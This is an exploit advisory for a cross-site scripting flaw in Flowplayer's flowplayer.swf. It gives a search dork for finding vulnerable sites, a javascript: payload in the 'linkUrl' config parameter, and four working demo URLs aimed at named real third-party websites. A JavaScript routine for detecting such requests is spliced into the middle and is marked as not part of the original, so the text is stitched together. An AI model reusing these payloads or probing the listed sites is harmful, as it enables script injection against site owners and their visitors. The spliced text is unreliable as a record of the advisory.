
Flowplayer Cross Site Scripting

Posted May 16, 2014
Authored by Muhammad Adeel

Flowplayer suffers from a cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | bd7b42db24351194f58b8602dcc1df39d38e8737c82222b996c47480705808f2

# Flowplayer (js & swf) XSS Vulnerability
# Date: 15/5/14
# Vulnerability Risk: High
# Vulnerable Software: http://flowplayer.org/
# Dork : inurl:flowplayer/flowplayer.swf
# Author: Muhammad Adeel aka Innoxent Stoker
# Founder | Urdusecurity.blogspot.com

# Vulnerability

XSS (cross-site scripting) is a vulnerability that interacts with either
the web server or its clients. It is highly dangerous because it may lead
to data theft and similar impact.

# POC & Exploit

The XSS is in the "config" parameter of flowplayer.swf: script executes
when it is supplied through the "linkUrl" parameter.


http://Vulnerablesite.com/flowplayer.swf?config={"clip":{"url":"
http://stream.flowplayer.org/bauhaus/624x260.mp4",
"linkUrl":"javascript:confirm(String.fromCharCode(88,83,83));"}}&.swf
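One way to flag the request pattern described above in web-server logs or a request filter, as an added example that is not part of the original advisory: it parses the `config` parameter and reports any `linkUrl` whose scheme is not `http` or `https`. The function names, the scheme allowlist and the sample requests are assumptions constructed for illustration.

```javascript
// Added example: flag Flowplayer SWF requests whose config carries a
// linkUrl with a non-http(s) scheme. All names here are hypothetical.
const SAFE_SCHEMES = new Set(["http", "https"]);

// Constructed sample requests (not taken from real logs).
const SAMPLE_REQUESTS = [
  '/player/flowplayer.swf?config={"clip":{"url":"a.mp4","linkUrl":"javascript:confirm(1);"}}&.swf',
  "/player/flowplayer.swf?config=%7B%22clip%22:%7B%22linkUrl%22:%22JaVaScRiPt:confirm(1)%22%7D%7D",
  '/player/flowplayer.swf?config={"clip":{"url":"a.mp4","linkUrl":"https://www.example.test/more"}}',
  "/player/flowplayer.swf?config={clip:{linkUrl:'data:text/html,x'}}",
];

// Scheme of a value as a browser would read it: leading whitespace/control
// characters and embedded tab/CR/LF are ignored. null means a relative URL.
function schemeOf(value) {
  const cleaned = String(value).replace(/^[\u0000-\u0020]+/, "").replace(/[\t\r\n]/g, "");
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(cleaned);
  return m ? m[1].toLowerCase() : null;
}

// Collect every "linkUrl" string anywhere in the parsed config object.
function collectLinkUrls(node, out = []) {
  if (node && typeof node === "object") {
    for (const [key, val] of Object.entries(node)) {
      if (key === "linkUrl" && typeof val === "string") out.push(val);
      else collectLinkUrls(val, out);
    }
  }
  return out;
}

// Inspect one request URL or path; returns { flagged, reason }.
function inspectRequest(requestUrl) {
  let url;
  try { url = new URL(requestUrl, "http://placeholder.invalid"); }
  catch { return { flagged: false, reason: "unparseable URL" }; }
  if (!/\.swf$/i.test(url.pathname)) return { flagged: false, reason: "not a SWF request" };
  const raw = url.searchParams.get("config"); // already percent-decoded
  if (raw === null) return { flagged: false, reason: "no config parameter" };
  let links;
  try { links = collectLinkUrls(JSON.parse(raw)); }
  catch { // config is not strict JSON: fall back to a pattern match
    links = [...raw.matchAll(/["']?linkUrl["']?\s*:\s*["']([^"']*)/g)].map(m => m[1]);
  }
  for (const link of links) {
    const scheme = schemeOf(link);
    if (scheme !== null && !SAFE_SCHEMES.has(scheme))
      return { flagged: true, reason: `linkUrl uses scheme "${scheme}:"` };
  }
  return { flagged: false, reason: "linkUrl absent, relative or http(s)" };
}
```

The same scheme allowlist can be applied server-side before a page embeds a user-influenced `linkUrl` into the player configuration.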


# Demo

http://www.advancementprojectca.org/sites/all/modules/flowplayer/flowplayer/flowplayer.swf?config={
"clip":{"url":"http://stream.flowplayer.org/bauhaus/624x260.mp4",
"linkUrl":"javascript:confirm(String.fromCharCode(88, 115, 115, 32, 80,
111, 99, 32, 47, 32, 77, 117, 104, 97, 109, 109, 97, 100, 32, 65, 100, 101,
101, 108, 32, 97, 107, 97, 32, 73, 110, 110, 111, 120, 101, 110, 116, 32,
83, 116, 111, 107, 101, 114, 32, 47, 47, 32, 85, 114, 100, 117, 83, 101,
99));"}}&.swf


http://www.dancelessonsaustin.com/template/fredwoodlands/js/flowplayer/flowplayer.swf?config={%22clip%22:{%22url%22:%22http://stream.flowplayer.org/bauhaus/624x260.mp4%22,%20%22linkUrl%22:%22javascript:confirm%28String.fromCharCode%2888,%20115,%20115,%2032,%2080,%20111,%2099,%2032,%2047,%2032,%2077,%20117,%20104,%2097,%20109,%20109,%2097,%20100,%2032,%2065,%20100,%20101,%20101,%20108,%2032,%2097,%20107,%2097,%2032,%2073,%20110,%20110,%20111,%20120,%20101,%20110,%20116,%2032,%2083,%20116,%20111,%20107,%20101,%20114,%2032,%2047,%2047,%2032,%2085,%20114,%20100,%20117,%2083,%20101,%2099%29%29;%22}}&.swf


http://www.tier1personnel.com/template/default/js/flowplayer/flowplayer.swf?config={%22clip%22:{%22url%22:%22http://stream.flowplayer.org/bauhaus/624x260.mp4%22,%20%22linkUrl%22:%22javascript:confirm%28String.fromCharCode%2888,%20115,%20115,%2032,%2080,%20111,%2099,%2032,%2047,%2032,%2077,%20117,%20104,%2097,%20109,%20109,%2097,%20100,%2032,%2065,%20100,%20101,%20101,%20108,%2032,%2097,%20107,%2097,%2032,%2073,%20110,%20110,%20111,%20120,%20101,%20110,%20116,%2032,%2083,%20116,%20111,%20107,%20101,%20114,%2032,%2047,%2047,%2032,%2085,%20114,%20100,%20117,%2083,%20101,%2099%29%29;%22}}&.swf


https://housing.wwu.edu/include/flowplayer/flowplayer.swf?config={%22clip%22:{%22url%22:%22http://stream.flowplayer.org/bauhaus/624x260.mp4%22,%20%22linkUrl%22:%22javascript:confirm%28String.fromCharCode%2888,%20115,%20115,%2032,%2080,%20111,%2099,%2032,%2047,%2032,%2077,%20117,%20104,%2097,%20109,%20109,%2097,%20100,%2032,%2065,%20100,%20101,%20101,%20108,%2032,%2097,%20107,%2097,%2032,%2073,%20110,%20110,%20111,%20120,%20101,%20110,%20116,%2032,%2083,%20116,%20111,%20107,%20101,%20114,%2032,%2047,%2047,%2032,%2085,%20114,%20100,%20117,%2083,%20101,%2099%29%29;%22}}&.swf